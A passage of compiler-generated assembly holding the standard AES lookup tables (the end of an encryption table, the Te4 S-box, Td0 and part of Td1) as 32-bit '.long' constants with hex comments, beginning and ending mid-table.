.long 3941213647 ; 0xeaea25cf
.long 1701162954 ; 0x6565afca
.long 2054852340 ; 0x7a7a8ef4
.long 2930698567 ; 0xaeaee947
.long 134748176 ; 0x8081810
.long 3132806511 ; 0xbabad56f
.long 2021165296 ; 0x787888f0
.long 623210314 ; 0x25256f4a
.long 774795868 ; 0x2e2e725c
.long 471606328 ; 0x1c1c2438
.long 2795958615 ; 0xa6a6f157
.long 3031746419 ; 0xb4b4c773
.long 3334885783 ; 0xc6c65197
.long 3907527627 ; 0xe8e823cb
.long 3722280097 ; 0xdddd7ca1
.long 1953799400 ; 0x74749ce8
.long 522133822 ; 0x1f1f213e
.long 1263263126 ; 0x4b4bdd96
.long 3183336545 ; 0xbdbddc61
.long 2341176845 ; 0x8b8b860d
.long 2324333839 ; 0x8a8a850f
.long 1886425312 ; 0x707090e0
.long 1044267644 ; 0x3e3e427c
.long 3048588401 ; 0xb5b5c471
.long 1718004428 ; 0x6666aacc
.long 1212733584 ; 0x4848d890
.long 50529542 ; 0x3030506
.long 4143317495 ; 0xf6f601f7
.long 235803164 ; 0xe0e121c
.long 1633788866 ; 0x6161a3c2
.long 892690282 ; 0x35355f6a
.long 1465383342 ; 0x5757f9ae
.long 3115962473 ; 0xb9b9d069
.long 2256965911 ; 0x86869117
.long 3250673817 ; 0xc1c15899
.long 488449850 ; 0x1d1d273a
.long 2661202215 ; 0x9e9eb927
.long 3789633753 ; 0xe1e138d9
.long 4177007595 ; 0xf8f813eb
.long 2560144171 ; 0x9898b32b
.long 286339874 ; 0x11113322
.long 1768537042 ; 0x6969bbd2
.long 3654906025 ; 0xd9d970a9
.long 2391705863 ; 0x8e8e8907
.long 2492770099 ; 0x9494a733
.long 2610673197 ; 0x9b9bb62d
.long 505291324 ; 0x1e1e223c
.long 2273808917 ; 0x87879215
.long 3924369609 ; 0xe9e920c9
.long 3469625735 ; 0xcece4987
.long 1431699370 ; 0x5555ffaa
.long 673740880 ; 0x28287850
.long 3755965093 ; 0xdfdf7aa5
.long 2358021891 ; 0x8c8c8f03
.long 2711746649 ; 0xa1a1f859
.long 2307489801 ; 0x89898009
.long 218961690 ; 0xd0d171a
.long 3217021541 ; 0xbfbfda65
.long 3873845719 ; 0xe6e631d7
.long 1111672452 ; 0x4242c684
.long 1751693520 ; 0x6868b8d0
.long 1094828930 ; 0x4141c382
.long 2576986153 ; 0x9999b029
.long 757954394 ; 0x2d2d775a
.long 252645662 ; 0xf0f111e
.long 2964376443 ; 0xb0b0cb7b
.long 1414855848 ; 0x5454fca8
.long 3149649517 ; 0xbbbbd66d
.long 370555436 ; 0x16163a2c
.p2align 2 ; @Te4
_Te4:
.long 1667457891 ; 0x63636363
.long 2088533116 ; 0x7c7c7c7c
.long 2004318071 ; 0x77777777
.long 2071690107 ; 0x7b7b7b7b
.long 4076008178 ; 0xf2f2f2f2
.long 1802201963 ; 0x6b6b6b6b
.long 1869573999 ; 0x6f6f6f6f
.long 3318072773 ; 0xc5c5c5c5
.long 808464432 ; 0x30303030
.long 16843009 ; 0x1010101
.long 1734829927 ; 0x67676767
.long 724249387 ; 0x2b2b2b2b
.long 4278124286 ; 0xfefefefe
.long 3621246935 ; 0xd7d7d7d7
.long 2880154539 ; 0xabababab
.long 1987475062 ; 0x76767676
.long 3402287818 ; 0xcacacaca
.long 2189591170 ; 0x82828282
.long 3385444809 ; 0xc9c9c9c9
.long 2105376125 ; 0x7d7d7d7d
.long 4210752250 ; 0xfafafafa
.long 1499027801 ; 0x59595959
.long 1195853639 ; 0x47474747
.long 4042322160 ; 0xf0f0f0f0
.long 2913840557 ; 0xadadadad
.long 3570717908 ; 0xd4d4d4d4
.long 2728567458 ; 0xa2a2a2a2
.long 2947526575 ; 0xafafafaf
.long 2627509404 ; 0x9c9c9c9c
.long 2762253476 ; 0xa4a4a4a4
.long 1920103026 ; 0x72727272
.long 3233857728 ; 0xc0c0c0c0
.long 3082270647 ; 0xb7b7b7b7
.long 4261281277 ; 0xfdfdfdfd
.long 2475922323 ; 0x93939393
.long 640034342 ; 0x26262626
.long 909522486 ; 0x36363636
.long 1061109567 ; 0x3f3f3f3f
.long 4160223223 ; 0xf7f7f7f7
.long 3435973836 ; 0xcccccccc
.long 875836468 ; 0x34343434
.long 2779096485 ; 0xa5a5a5a5
.long 3857049061 ; 0xe5e5e5e5
.long 4059165169 ; 0xf1f1f1f1
.long 1903260017 ; 0x71717171
.long 3638089944 ; 0xd8d8d8d8
.long 825307441 ; 0x31313131
.long 353703189 ; 0x15151515
.long 67372036 ; 0x4040404
.long 3351758791 ; 0xc7c7c7c7
.long 589505315 ; 0x23232323
.long 3284386755 ; 0xc3c3c3c3
.long 404232216 ; 0x18181818
.long 2526451350 ; 0x96969696
.long 84215045 ; 0x5050505
.long 2593823386 ; 0x9a9a9a9a
.long 117901063 ; 0x7070707
.long 303174162 ; 0x12121212
.long 2155905152 ; 0x80808080
.long 3806520034 ; 0xe2e2e2e2
.long 3958107115 ; 0xebebebeb
.long 656877351 ; 0x27272727
.long 2998055602 ; 0xb2b2b2b2
.long 1970632053 ; 0x75757575
.long 151587081 ; 0x9090909
.long 2206434179 ; 0x83838383
.long 741092396 ; 0x2c2c2c2c
.long 437918234 ; 0x1a1a1a1a
.long 454761243 ; 0x1b1b1b1b
.long 1852730990 ; 0x6e6e6e6e
.long 1515870810 ; 0x5a5a5a5a
.long 2694881440 ; 0xa0a0a0a0
.long 1381126738 ; 0x52525252
.long 993737531 ; 0x3b3b3b3b
.long 3604403926 ; 0xd6d6d6d6
.long 3014898611 ; 0xb3b3b3b3
.long 690563369 ; 0x29292929
.long 3823363043 ; 0xe3e3e3e3
.long 791621423 ; 0x2f2f2f2f
.long 2223277188 ; 0x84848484
.long 1397969747 ; 0x53535353
.long 3520188881 ; 0xd1d1d1d1
.long 0 ; 0x0
.long 3991793133 ; 0xedededed
.long 538976288 ; 0x20202020
.long 4244438268 ; 0xfcfcfcfc
.long 2981212593 ; 0xb1b1b1b1
.long 1532713819 ; 0x5b5b5b5b
.long 1785358954 ; 0x6a6a6a6a
.long 3419130827 ; 0xcbcbcbcb
.long 3200171710 ; 0xbebebebe
.long 960051513 ; 0x39393939
.long 1246382666 ; 0x4a4a4a4a
.long 1280068684 ; 0x4c4c4c4c
.long 1482184792 ; 0x58585858
.long 3486502863 ; 0xcfcfcfcf
.long 3503345872 ; 0xd0d0d0d0
.long 4025479151 ; 0xefefefef
.long 2863311530 ; 0xaaaaaaaa
.long 4227595259 ; 0xfbfbfbfb
.long 1128481603 ; 0x43434343
.long 1296911693 ; 0x4d4d4d4d
.long 858993459 ; 0x33333333
.long 2240120197 ; 0x85858585
.long 1162167621 ; 0x45454545
.long 4193909241 ; 0xf9f9f9f9
.long 33686018 ; 0x2020202
.long 2139062143 ; 0x7f7f7f7f
.long 1347440720 ; 0x50505050
.long 1010580540 ; 0x3c3c3c3c
.long 2678038431 ; 0x9f9f9f9f
.long 2829625512 ; 0xa8a8a8a8
.long 1364283729 ; 0x51515151
.long 2745410467 ; 0xa3a3a3a3
.long 1077952576 ; 0x40404040
.long 2408550287 ; 0x8f8f8f8f
.long 2459079314 ; 0x92929292
.long 2644352413 ; 0x9d9d9d9d
.long 943208504 ; 0x38383838
.long 4126537205 ; 0xf5f5f5f5
.long 3166485692 ; 0xbcbcbcbc
.long 3065427638 ; 0xb6b6b6b6
.long 3671775962 ; 0xdadadada
.long 555819297 ; 0x21212121
.long 269488144 ; 0x10101010
.long 4294967295 ; 0xffffffff
.long 4092851187 ; 0xf3f3f3f3
.long 3537031890 ; 0xd2d2d2d2
.long 3452816845 ; 0xcdcdcdcd
.long 202116108 ; 0xc0c0c0c
.long 320017171 ; 0x13131313
.long 3974950124 ; 0xecececec
.long 1600085855 ; 0x5f5f5f5f
.long 2543294359 ; 0x97979797
.long 1145324612 ; 0x44444444
.long 387389207 ; 0x17171717
.long 3301229764 ; 0xc4c4c4c4
.long 2812782503 ; 0xa7a7a7a7
.long 2122219134 ; 0x7e7e7e7e
.long 1027423549 ; 0x3d3d3d3d
.long 1684300900 ; 0x64646464
.long 1566399837 ; 0x5d5d5d5d
.long 421075225 ; 0x19191919
.long 1936946035 ; 0x73737373
.long 1616928864 ; 0x60606060
.long 2172748161 ; 0x81818181
.long 1330597711 ; 0x4f4f4f4f
.long 3705461980 ; 0xdcdcdcdc
.long 572662306 ; 0x22222222
.long 707406378 ; 0x2a2a2a2a
.long 2425393296 ; 0x90909090
.long 2290649224 ; 0x88888888
.long 1179010630 ; 0x46464646
.long 4008636142 ; 0xeeeeeeee
.long 3099113656 ; 0xb8b8b8b8
.long 336860180 ; 0x14141414
.long 3739147998 ; 0xdededede
.long 1583242846 ; 0x5e5e5e5e
.long 185273099 ; 0xb0b0b0b
.long 3688618971 ; 0xdbdbdbdb
.long 3772834016 ; 0xe0e0e0e0
.long 842150450 ; 0x32323232
.long 976894522 ; 0x3a3a3a3a
.long 168430090 ; 0xa0a0a0a
.long 1229539657 ; 0x49494949
.long 101058054 ; 0x6060606
.long 606348324 ; 0x24242424
.long 1549556828 ; 0x5c5c5c5c
.long 3267543746 ; 0xc2c2c2c2
.long 3553874899 ; 0xd3d3d3d3
.long 2896997548 ; 0xacacacac
.long 1650614882 ; 0x62626262
.long 2442236305 ; 0x91919191
.long 2509608341 ; 0x95959595
.long 3840206052 ; 0xe4e4e4e4
.long 2038004089 ; 0x79797979
.long 3890735079 ; 0xe7e7e7e7
.long 3368601800 ; 0xc8c8c8c8
.long 926365495 ; 0x37373737
.long 1835887981 ; 0x6d6d6d6d
.long 2374864269 ; 0x8d8d8d8d
.long 3587560917 ; 0xd5d5d5d5
.long 1313754702 ; 0x4e4e4e4e
.long 2846468521 ; 0xa9a9a9a9
.long 1819044972 ; 0x6c6c6c6c
.long 1448498774 ; 0x56565656
.long 4109694196 ; 0xf4f4f4f4
.long 3941264106 ; 0xeaeaeaea
.long 1701143909 ; 0x65656565
.long 2054847098 ; 0x7a7a7a7a
.long 2930683566 ; 0xaeaeaeae
.long 134744072 ; 0x8080808
.long 3132799674 ; 0xbabababa
.long 2021161080 ; 0x78787878
.long 623191333 ; 0x25252525
.long 774778414 ; 0x2e2e2e2e
.long 471604252 ; 0x1c1c1c1c
.long 2795939494 ; 0xa6a6a6a6
.long 3031741620 ; 0xb4b4b4b4
.long 3334915782 ; 0xc6c6c6c6
.long 3907578088 ; 0xe8e8e8e8
.long 3722304989 ; 0xdddddddd
.long 1953789044 ; 0x74747474
.long 522133279 ; 0x1f1f1f1f
.long 1263225675 ; 0x4b4b4b4b
.long 3183328701 ; 0xbdbdbdbd
.long 2341178251 ; 0x8b8b8b8b
.long 2324335242 ; 0x8a8a8a8a
.long 1886417008 ; 0x70707070
.long 1044266558 ; 0x3e3e3e3e
.long 3048584629 ; 0xb5b5b5b5
.long 1717986918 ; 0x66666666
.long 1212696648 ; 0x48484848
.long 50529027 ; 0x3030303
.long 4143380214 ; 0xf6f6f6f6
.long 235802126 ; 0xe0e0e0e
.long 1633771873 ; 0x61616161
.long 892679477 ; 0x35353535
.long 1465341783 ; 0x57575757
.long 3115956665 ; 0xb9b9b9b9
.long 2256963206 ; 0x86868686
.long 3250700737 ; 0xc1c1c1c1
.long 488447261 ; 0x1d1d1d1d
.long 2661195422 ; 0x9e9e9e9e
.long 3789677025 ; 0xe1e1e1e1
.long 4177066232 ; 0xf8f8f8f8
.long 2560137368 ; 0x98989898
.long 286331153 ; 0x11111111
.long 1768515945 ; 0x69696969
.long 3654932953 ; 0xd9d9d9d9
.long 2391707278 ; 0x8e8e8e8e
.long 2492765332 ; 0x94949494
.long 2610666395 ; 0x9b9b9b9b
.long 505290270 ; 0x1e1e1e1e
.long 2273806215 ; 0x87878787
.long 3924421097 ; 0xe9e9e9e9
.long 3469659854 ; 0xcececece
.long 1431655765 ; 0x55555555
.long 673720360 ; 0x28282828
.long 3755991007 ; 0xdfdfdfdf
.long 2358021260 ; 0x8c8c8c8c
.long 2711724449 ; 0xa1a1a1a1
.long 2307492233 ; 0x89898989
.long 218959117 ; 0xd0d0d0d
.long 3217014719 ; 0xbfbfbfbf
.long 3873892070 ; 0xe6e6e6e6
.long 1111638594 ; 0x42424242
.long 1751672936 ; 0x68686868
.long 1094795585 ; 0x41414141
.long 2576980377 ; 0x99999999
.long 757935405 ; 0x2d2d2d2d
.long 252645135 ; 0xf0f0f0f
.long 2964369584 ; 0xb0b0b0b0
.long 1414812756 ; 0x54545454
.long 3149642683 ; 0xbbbbbbbb
.long 370546198 ; 0x16161616
.p2align 2 ; @Td0
_Td0:
.long 1374988112 ; 0x51f4a750
.long 2118214995 ; 0x7e416553
.long 437757123 ; 0x1a17a4c3
.long 975658646 ; 0x3a275e96
.long 1001089995 ; 0x3bab6bcb
.long 530400753 ; 0x1f9d45f1
.long 2902087851 ; 0xacfa58ab
.long 1273168787 ; 0x4be30393
.long 540080725 ; 0x2030fa55
.long 2910219766 ; 0xad766df6
.long 2295101073 ; 0x88cc7691
.long 4110568485 ; 0xf5024c25
.long 1340463100 ; 0x4fe5d7fc
.long 3307916247 ; 0xc52acbd7
.long 641025152 ; 0x26354480
.long 3043140495 ; 0xb562a38f
.long 3736164937 ; 0xdeb15a49
.long 632953703 ; 0x25ba1b67
.long 1172967064 ; 0x45ea0e98
.long 1576976609 ; 0x5dfec0e1
.long 3274667266 ; 0xc32f7502
.long 2169303058 ; 0x814cf012
.long 2370213795 ; 0x8d4697a3
.long 1809054150 ; 0x6bd3f9c6
.long 59727847 ; 0x38f5fe7
.long 361929877 ; 0x15929c95
.long 3211623147 ; 0xbf6d7aeb
.long 2505202138 ; 0x955259da
.long 3569255213 ; 0xd4be832d
.long 1484005843 ; 0x587421d3
.long 1239443753 ; 0x49e06929
.long 2395588676 ; 0x8ec9c844
.long 1975683434 ; 0x75c2896a
.long 4102977912 ; 0xf48e7978
.long 2572697195 ; 0x99583e6b
.long 666464733 ; 0x27b971dd
.long 3202437046 ; 0xbee14fb6
.long 4035489047 ; 0xf088ad17
.long 3374361702 ; 0xc920ac66
.long 2110667444 ; 0x7dce3ab4
.long 1675577880 ; 0x63df4a18
.long 3843699074 ; 0xe51a3182
.long 2538681184 ; 0x97513360
.long 1649639237 ; 0x62537f45
.long 2976151520 ; 0xb16477e0
.long 3144396420 ; 0xbb6bae84
.long 4269907996 ; 0xfe81a01c
.long 4178062228 ; 0xf9082b94
.long 1883793496 ; 0x70486858
.long 2403728665 ; 0x8f45fd19
.long 2497604743 ; 0x94de6c87
.long 1383856311 ; 0x527bf8b7
.long 2876494627 ; 0xab73d323
.long 1917518562 ; 0x724b02e2
.long 3810496343 ; 0xe31f8f57
.long 1716890410 ; 0x6655ab2a
.long 3001755655 ; 0xb2eb2807
.long 800440835 ; 0x2fb5c203
.long 2261089178 ; 0x86c57b9a
.long 3543599269 ; 0xd33708a5
.long 807962610 ; 0x302887f2
.long 599762354 ; 0x23bfa5b2
.long 33778362 ; 0x2036aba
.long 3977675356 ; 0xed16825c
.long 2328828971 ; 0x8acf1c2b
.long 2809771154 ; 0xa779b492
.long 4077384432 ; 0xf307f2f0
.long 1315562145 ; 0x4e69e2a1
.long 1708848333 ; 0x65daf4cd
.long 101039829 ; 0x605bed5
.long 3509871135 ; 0xd134621f
.long 3299278474 ; 0xc4a6fe8a
.long 875451293 ; 0x342e539d
.long 2733856160 ; 0xa2f355a0
.long 92987698 ; 0x58ae132
.long 2767645557 ; 0xa4f6eb75
.long 193195065 ; 0xb83ec39
.long 1080094634 ; 0x4060efaa
.long 1584504582 ; 0x5e719f06
.long 3178106961 ; 0xbd6e1051
.long 1042385657 ; 0x3e218af9
.long 2531067453 ; 0x96dd063d
.long 3711829422 ; 0xdd3e05ae
.long 1306967366 ; 0x4de6bd46
.long 2438237621 ; 0x91548db5
.long 1908694277 ; 0x71c45d05
.long 67556463 ; 0x406d46f
.long 1615861247 ; 0x605015ff
.long 429456164 ; 0x1998fb24
.long 3602770327 ; 0xd6bde997
.long 2302690252 ; 0x894043cc
.long 1742315127 ; 0x67d99e77
.long 2968011453 ; 0xb0e842bd
.long 126454664 ; 0x7898b88
.long 3877198648 ; 0xe7195b38
.long 2043211483 ; 0x79c8eedb
.long 2709260871 ; 0xa17c0a47
.long 2084704233 ; 0x7c420fe9
.long 4169408201 ; 0xf8841ec9
.long 0 ; 0x0
.long 159417987 ; 0x9808683
.long 841739592 ; 0x322bed48
.long 504459436 ; 0x1e1170ac
.long 1817866830 ; 0x6c5a724e
.long 4245618683 ; 0xfd0efffb
.long 260388950 ; 0xf853856
.long 1034867998 ; 0x3daed51e
.long 908933415 ; 0x362d3927
.long 168810852 ; 0xa0fd964
.long 1750902305 ; 0x685ca621
.long 2606453969 ; 0x9b5b54d1
.long 607530554 ; 0x24362e3a
.long 202008497 ; 0xc0a67b1
.long 2472011535 ; 0x9357e70f
.long 3035535058 ; 0xb4ee96d2
.long 463180190 ; 0x1b9b919e
.long 2160117071 ; 0x80c0c54f
.long 1641816226 ; 0x61dc20a2
.long 1517767529 ; 0x5a774b69
.long 470948374 ; 0x1c121a16
.long 3801332234 ; 0xe293ba0a
.long 3231722213 ; 0xc0a02ae5
.long 1008918595 ; 0x3c22e043
.long 303765277 ; 0x121b171d
.long 235474187 ; 0xe090d0b
.long 4069246893 ; 0xf28bc7ad
.long 766945465 ; 0x2db6a8b9
.long 337553864 ; 0x141ea9c8
.long 1475418501 ; 0x57f11985
.long 2943682380 ; 0xaf75074c
.long 4003061179 ; 0xee99ddbb
.long 2743034109 ; 0xa37f60fd
.long 4144047775 ; 0xf701269f
.long 1551037884 ; 0x5c72f5bc
.long 1147550661 ; 0x44663bc5
.long 1543208500 ; 0x5bfb7e34
.long 2336434550 ; 0x8b432976
.long 3408119516 ; 0xcb23c6dc
.long 3069049960 ; 0xb6edfc68
.long 3102011747 ; 0xb8e4f163
.long 3610369226 ; 0xd731dcca
.long 1113818384 ; 0x42638510
.long 328671808 ; 0x13972240
.long 2227573024 ; 0x84c61120
.long 2236228733 ; 0x854a247d
.long 3535486456 ; 0xd2bb3df8
.long 2935566865 ; 0xaef93211
.long 3341394285 ; 0xc729a16d
.long 496906059 ; 0x1d9e2f4b
.long 3702665459 ; 0xdcb230f3
.long 226906860 ; 0xd8652ec
.long 2009195472 ; 0x77c1e3d0
.long 733156972 ; 0x2bb3166c
.long 2842737049 ; 0xa970b999
.long 294930682 ; 0x119448fa
.long 1206477858 ; 0x47e96422
.long 2835123396 ; 0xa8fc8cc4
.long 2700099354 ; 0xa0f03f1a
.long 1451044056 ; 0x567d2cd8
.long 573804783 ; 0x223390ef
.long 2269728455 ; 0x87494ec7
.long 3644379585 ; 0xd938d1c1
.long 2362090238 ; 0x8ccaa2fe
.long 2564033334 ; 0x98d40b36
.long 2801107407 ; 0xa6f581cf
.long 2776292904 ; 0xa57ade28
.long 3669462566 ; 0xdab78e26
.long 1068351396 ; 0x3fadbfa4
.long 742039012 ; 0x2c3a9de4
.long 1350078989 ; 0x5078920d
.long 1784663195 ; 0x6a5fcc9b
.long 1417561698 ; 0x547e4662
.long 4136440770 ; 0xf68d13c2
.long 2430122216 ; 0x90d8b8e8
.long 775550814 ; 0x2e39f75e
.long 2193862645 ; 0x82c3aff5
.long 2673705150 ; 0x9f5d80be
.long 1775276924 ; 0x69d0937c
.long 1876241833 ; 0x6fd52da9
.long 3475313331 ; 0xcf2512b3
.long 3366754619 ; 0xc8ac993b
.long 270040487 ; 0x10187da7
.long 3902563182 ; 0xe89c636e
.long 3678124923 ; 0xdb3bbb7b
.long 3441850377 ; 0xcd267809
.long 1851332852 ; 0x6e5918f4
.long 3969562369 ; 0xec9ab701
.long 2203032232 ; 0x834f9aa8
.long 3868552805 ; 0xe6956e65
.long 2868897406 ; 0xaaffe67e
.long 566021896 ; 0x21bccf08
.long 4011190502 ; 0xef15e8e6
.long 3135740889 ; 0xbae79bd9
.long 1248802510 ; 0x4a6f36ce
.long 3936291284 ; 0xea9f09d4
.long 699432150 ; 0x29b07cd6
.long 832877231 ; 0x31a4b2af
.long 708780849 ; 0x2a3f2331
.long 3332740144 ; 0xc6a59430
.long 899835584 ; 0x35a266c0
.long 1951317047 ; 0x744ebc37
.long 4236429990 ; 0xfc82caa6
.long 3767586992 ; 0xe090d0b0
.long 866637845 ; 0x33a7d815
.long 4043610186 ; 0xf104984a
.long 1106041591 ; 0x41ecdaf7
.long 2144161806 ; 0x7fcd500e
.long 395441711 ; 0x1791f62f
.long 1984812685 ; 0x764dd68d
.long 1139781709 ; 0x43efb04d
.long 3433712980 ; 0xccaa4d54
.long 3835036895 ; 0xe49604df
.long 2664543715 ; 0x9ed1b5e3
.long 1282050075 ; 0x4c6a881b
.long 3240894392 ; 0xc12c1fb8
.long 1181045119 ; 0x4665517f
.long 2640243204 ; 0x9d5eea04
.long 25965917 ; 0x18c355d
.long 4203181171 ; 0xfa877473
.long 4211818798 ; 0xfb0b412e
.long 3009879386 ; 0xb3671d5a
.long 2463879762 ; 0x92dbd252
.long 3910161971 ; 0xe9105633
.long 1842759443 ; 0x6dd64713
.long 2597806476 ; 0x9ad7618c
.long 933301370 ; 0x37a10c7a
.long 1509430414 ; 0x59f8148e
.long 3943906441 ; 0xeb133c89
.long 3467192302 ; 0xcea927ee
.long 3076639029 ; 0xb761c935
.long 3776767469 ; 0xe11ce5ed
.long 2051518780 ; 0x7a47b13c
.long 2631065433 ; 0x9cd2df59
.long 1441952575 ; 0x55f2733f
.long 404016761 ; 0x1814ce79
.long 1942435775 ; 0x73c737bf
.long 1408749034 ; 0x53f7cdea
.long 1610459739 ; 0x5ffdaa5b
.long 3745345300 ; 0xdf3d6f14
.long 2017778566 ; 0x7844db86
.long 3400528769 ; 0xcaaff381
.long 3110650942 ; 0xb968c43e
.long 941896748 ; 0x3824342c
.long 3265478751 ; 0xc2a3405f
.long 371049330 ; 0x161dc372
.long 3168937228 ; 0xbce2250c
.long 675039627 ; 0x283c498b
.long 4279080257 ; 0xff0d9541
.long 967311729 ; 0x39a80171
.long 135050206 ; 0x80cb3de
.long 3635733660 ; 0xd8b4e49c
.long 1683407248 ; 0x6456c190
.long 2076935265 ; 0x7bcb8461
.long 3576870512 ; 0xd532b670
.long 1215061108 ; 0x486c5c74
.long 3501741890 ; 0xd0b85742
.p2align 2 ; @Td1
_Td1:
.long 1347548327 ; 0x5051f4a7
.long 1400783205 ; 0x537e4165
.long 3273267108 ; 0xc31a17a4
.long 2520393566 ; 0x963a275e
.long 3409685355 ; 0xcb3bab6b
.long 4045380933 ; 0xf11f9d45
.long 2880240216 ; 0xabacfa58
.long 2471224067 ; 0x934be303
.long 1428173050 ; 0x552030fa
.long 4138563181 ; 0xf6ad766d
.long 2441661558 ; 0x9188cc76
.long 636813900 ; 0x25f5024c
.long 4233094615 ; 0xfc4fe5d7
.long 3620022987 ; 0xd7c52acb
.long 2149987652 ; 0x80263544
.long 2411029155 ; 0x8fb562a3
.long 1239331162 ; 0x49deb15a
.long 1730525723 ; 0x6725ba1b
.long 2554718734 ; 0x9845ea0e
.long 3781033664 ; 0xe15dfec0
.long 46346101 ; 0x2c32f75
.long 310463728 ; 0x12814cf0
.long 2743944855 ; 0xa38d4697
.long 3328955385 ; 0xc66bd3f9
.long 3875770207 ; 0xe7038f5f
.long 2501218972 ; 0x9515929c
.long 3955191162 ; 0xebbf6d7a
.long 3667219033 ; 0xda955259
.long 768917123 ; 0x2dd4be83
.long 3545789473 ; 0xd3587421
.long 692707433 ; 0x2949e069
.long 1150208456 ; 0x448ec9c8
.long 1786102409 ; 0x6a75c289
.long 2029293177 ; 0x78f48e79
.long 1805211710 ; 0x6b99583e
.long 3710368113 ; 0xdd27b971
.long 3065962831 ; 0xb6bee14f
.long 401639597 ; 0x17f088ad
.long 1724457132 ; 0x66c920ac
.long 3028143674 ; 0xb47dce3a
.long 409198410 ; 0x1863df4a
.long 2196052529 ; 0x82e51a31
.long 1620529459 ; 0x60975133
.long 1164071807 ; 0x4562537f
.long 3769721975 ; 0xe0b16477
.long 2226875310 ; 0x84bb6bae
.long 486441376 ; 0x1cfe81a0
.long 2499348523 ; 0x94f9082b
.long 1483753576 ; 0x58704868
.long 428819965 ; 0x198f45fd
.long 2274680428 ; 0x8794de6c
.long 3075636216 ; 0xb7527bf8
.long 598438867 ; 0x23ab73d3
.long 3799141122 ; 0xe2724b02
.long 1474502543 ; 0x57e31f8f
.long 711349675 ; 0x2a6655ab
.long 129166120 ; 0x7b2eb28
.long 53458370 ; 0x32fb5c2
.long 2592523643 ; 0x9a86c57b
.long 2782082824 ; 0xa5d33708
.long 4063242375 ; 0xf2302887
.long 2988687269 ; 0xb223bfa5
.long 3120694122 ; 0xba02036a
.long 1559041666 ; 0x5ced1682
.long 730517276 ; 0x2b8acf1c
.long 2460449204 ; 0x92a779b4
.long 4042459122 ; 0xf0f307f2
.long 2706270690 ; 0xa14e69e2
.long 3446004468 ; 0xcd65daf4
.long 3573941694 ; 0xd50605be
.long 533804130 ; 0x1fd13462
.long 2328143614 ; 0x8ac4a6fe
.long 2637442643 ; 0x9d342e53
.long 2695033685 ; 0xa0a2f355
.long 839224033 ; 0x32058ae1
.long 1973745387 ; 0x75a4f6eb
.long 957055980 ; 0x390b83ec
.long 2856345839 ; 0xaa4060ef
.long 106852767 ; 0x65e719f
.long 1371368976 ; 0x51bd6e10
.long 4181598602 ; 0xf93e218a
.long 1033297158 ; 0x3d96dd06
.long 2933734917 ; 0xaedd3e05
.long 1179510461 ; 0x464de6bd
.long 3046200461 ; 0xb591548d
.long 91341917 ; 0x571c45d
.long 1862534868 ; 0x6f0406d4
.long 4284502037 ; 0xff605015
.long 605657339 ; 0x241998fb
.long 2547432937 ; 0x97d6bde9
.long 3431546947 ; 0xcc894043
.long 2003294622 ; 0x7767d99e
.long 3182487618 ; 0xbdb0e842
.long 2282195339 ; 0x8807898b
.long 954669403 ; 0x38e7195b
.long 3682191598 ; 0xdb79c8ee
.long 1201765386 ; 0x47a17c0a
.long 3917234703 ; 0xe97c420f
.long 3388507166 ; 0xc9f8841e
.long 0 ; 0x0
.long 2198438022 ; 0x83098086
.long 1211247597 ; 0x48322bed
.long 2887651696 ; 0xac1e1170
.long 1315723890 ; 0x4e6c5a72
.long 4227665663 ; 0xfbfd0eff
.long 1443857720 ; 0x560f8538
.long 507358933 ; 0x1e3daed5
.long 657861945 ; 0x27362d39
.long 1678381017 ; 0x640a0fd9
.long 560487590 ; 0x21685ca6
.long 3516619604 ; 0xd19b5b54
.long 975451694 ; 0x3a24362e
.long 2970356327 ; 0xb10c0a67
.long 261314535 ; 0xf9357e7
.long 3535072918 ; 0xd2b4ee96
.long 2652609425 ; 0x9e1b9b91
.long 1333838021 ; 0x4f80c0c5
.long 2724322336 ; 0xa261dc20
.long 1767536459 ; 0x695a774b
.long 370938394 ; 0x161c121a
.long 182621114 ; 0xae293ba
.long 3854606378 ; 0xe5c0a02a
.long 1128014560 ; 0x433c22e0
.long 487725847 ; 0x1d121b17
.long 185469197 ; 0xb0e090d
.long 2918353863 ; 0xadf28bc7
.long 3106780840 ; 0xb92db6a8
.long 3356761769 ; 0xc8141ea9
.long 2237133081 ; 0x8557f119
.long 1286567175 ; 0x4caf7507
.long 3152976349 ; 0xbbee99dd
.long 4255350624 ; 0xfda37f60
.long 2683765030 ; 0x9ff70126
.long 3160175349 ; 0xbc5c72f5
.long 3309594171 ; 0xc544663b
.long 878443390 ; 0x345bfb7e
.long 1988838185 ; 0x768b4329
.long 3704300486 ; 0xdccb23c6
.long 1756818940 ; 0x68b6edfc
.long 1673061617 ; 0x63b8e4f1
.long 3403100636 ; 0xcad731dc
.long 272786309 ; 0x10426385
.long 1075025698 ; 0x40139722
.long 545572369 ; 0x2084c611
.long 2105887268 ; 0x7d854a24
.long 4174560061 ; 0xf8d2bb3d
.long 296679730 ; 0x11aef932
.long 1841768865 ; 0x6dc729a1
.long 1260232239 ; 0x4b1d9e2f
.long 4091327024 ; 0xf3dcb230
.long 3960309330 ; 0xec0d8652
.long 3497509347 ; 0xd077c1e3
.long 1814803222 ; 0x6c2bb316
.long 2578018489 ; 0x99a970b9
.long 4195456072 ; 0xfa119448
.long 575138148 ; 0x2247e964
.long 3299409036 ; 0xc4a8fc8c
.long 446754879 ; 0x1aa0f03f
.long 3629546796 ; 0xd8567d2c
.long 4011996048 ; 0xef223390
.long 3347532110 ; 0xc787494e
.long 3252238545 ; 0xc1d938d1
.long 4270639778 ; 0xfe8ccaa2
.long 915985419 ; 0x3698d40b
.long 3483825537 ; 0xcfa6f581
.long 681933534 ; 0x28a57ade
.long 651868046 ; 0x26dab78e
.long 2755636671 ; 0xa43fadbf
.long 3828103837 ; 0xe42c3a9d
.long 223377554 ; 0xd507892
.long 2607439820 ; 0x9b6a5fcc
.long 1649704518 ; 0x62547e46
.long 3270937875 ; 0xc2f68d13
.long 3901806776 ; 0xe890d8b8
.long 1580087799 ; 0x5e2e39f7
.long 4118987695 ; 0xf582c3af
.long 3198115200 ; 0xbe9f5d80
.long 2087309459 ; 0x7c69d093
.long 2842678573 ; 0xa96fd52d
.long 3016697106 ; 0xb3cf2512
.long 1003007129 ; 0x3bc8ac99
.long 2802849917 ; 0xa710187d
.long 1860738147 ; 0x6ee89c63
.long 2077965243 ; 0x7bdb3bbb
.long 164439672 ; 0x9cd2678
.long 4100872472 ; 0xf46e5918
.long 32283319 ; 0x1ec9ab7
.long 2827177882 ; 0xa8834f9a
.long 1709610350 ; 0x65e6956e
.long 2125135846 ; 0x7eaaffe6
.long 136428751 ; 0x821bccf
.long 3874428392 ; 0xe6ef15e8
.long 3652904859 ; 0xd9bae79b
.long 3460984630 ; 0xce4a6f36
